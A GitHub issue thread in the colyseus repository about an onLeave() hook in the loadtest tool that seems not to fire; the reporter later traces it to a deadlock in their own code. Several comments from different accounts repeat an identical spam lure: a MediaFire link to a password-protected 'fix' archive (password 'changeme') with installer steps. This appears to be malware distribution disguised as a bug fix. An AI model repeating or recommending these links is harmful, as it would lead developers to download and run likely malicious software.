### ISSUE TITLE
[Bug]: I think only one onLeave() hook can exist at a time

### ISSUE THREAD

**Issue by francislavoie** [colyseus/colyseus#764]
### Context

I'm playing around with the loadtest tool.

### Bug description

I'm playing around with the loadtest tool, and I have a `game.room.onLeave(async (code) => {` hook in my loadtest `main()` but it seems to never get called (I never get a `console.log` from it).

I think the trouble is that `onLeave` is registered in the loadtest base to track disconnect count:

https://github.com/colyseus/colyseus/blob/a7aa9a72d096f1ee455b4450dad659dfb309d4e1/packages/loadtest/src/index.ts#L451

I think this means only this one will work and it eats my own `onLeave` (overwriting it). When the server shuts down, I definitely see the `disconnected` count in the load test UI increase, but my own callback isn't invoked.

Shouldn't `onLeave` store an array of callbacks instead of just one? I'm reading through https://github.com/colyseus/colyseus.js/blob/master/src/Room.ts and it seems to set up a signal which should hold a list of event emitters, so it should trigger... So I'm really confused.

### Reproduction

Loadtest setup is entirely dependent on the server it's connecting against, but it should be straight forwards to just kill the server before the client does or something and expect to see a log message if binding `onLeave` like this or w/e

```ts
  room.onLeave(async (code) => {
    console.log(`DISCONNECTED`, `Exit code: ${code}`);
  });
```

### Steps to reproduce

N/A

### Environment & Versions

- Node: v22.5.1
- Colyseus: v0.15.25
- Loadtest: v0.15.6

**Comment by francislavoie** [comment]
Oops my bad, I meant to post this on https://github.com/colyseus/colyseus.js :man_facepalming: Feel free to move the issue over :sweat_smile:

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by francislavoie** [comment]
Oh hmm, nevermind. I was doing something dumb. I had an `await` just before my `console.log` in my real code which effectively never returned because of a logic deadlock. Cool cool cool.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
